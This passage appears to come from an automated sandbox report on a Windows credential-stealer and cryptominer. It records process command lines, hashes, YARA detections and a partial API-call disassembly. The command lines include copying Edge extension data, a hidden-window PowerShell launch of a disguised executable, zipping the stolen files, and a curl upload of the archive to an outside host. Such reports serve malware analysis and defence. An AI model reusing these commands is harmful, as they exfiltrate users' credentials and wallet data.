                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921605564.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921957521.0000000002940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:44
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
                                                                                            Imagebase:0x7a0000
                                                                                            File size:43'520 bytes
                                                                                            MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3922955190.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3922955190.000000000282E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3923072888.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3922851056.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:45
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:46
                                                                                            Start time:03:35:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:47
                                                                                            Start time:03:35:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                                                                            Imagebase:0x1ee64180000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:77334F046A50530CDC6E585E59165264
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002F.00000000.3929689424.000001EE64182000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.4579567004.000001EE7636F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 71%, ReversingLabs
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:48
                                                                                            Start time:03:35:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:curl -s https://api.ipify.org
                                                                                            Imagebase:0x40000
                                                                                            File size:470'528 bytes
                                                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949785259.0000000003090000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949654708.0000000002E10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949588904.0000000002C90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949654708.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:49
                                                                                            Start time:03:35:45
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:50
                                                                                            Start time:03:35:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\smartscreen.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                                                                            Imagebase:0x21641230000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:1FED66D1F6B85BDA20FE0403CA01C9BD
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:51
                                                                                            Start time:03:35:47
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:52
                                                                                            Start time:03:35:47
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                                                                            Imagebase:0x40000
                                                                                            File size:470'528 bytes
                                                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3988717578.00000000030E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3987839867.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000003.3987493910.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3987947915.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3988039923.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:53
                                                                                            Start time:03:35:54
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                                                                            Imagebase:0x1f7888f0000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:77334F046A50530CDC6E585E59165264
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79B454000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000035.00000002.4566717122.000001F78A821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79B4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:54
                                                                                            Start time:03:36:02
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\smartscreen.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                                                                            Imagebase:0x21533270000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:1FED66D1F6B85BDA20FE0403CA01C9BD
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000036.00000002.4565336493.0000021535001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:55
                                                                                            Start time:03:36:11
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:77334F046A50530CDC6E585E59165264
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000037.00000002.4566695155.000002748FD21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000037.00000002.4582934656.000002749FD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:17.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21%
                                                                                              Total number of Nodes:1482
                                                                                              Total number of Limit Nodes:26
                                                                                              execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 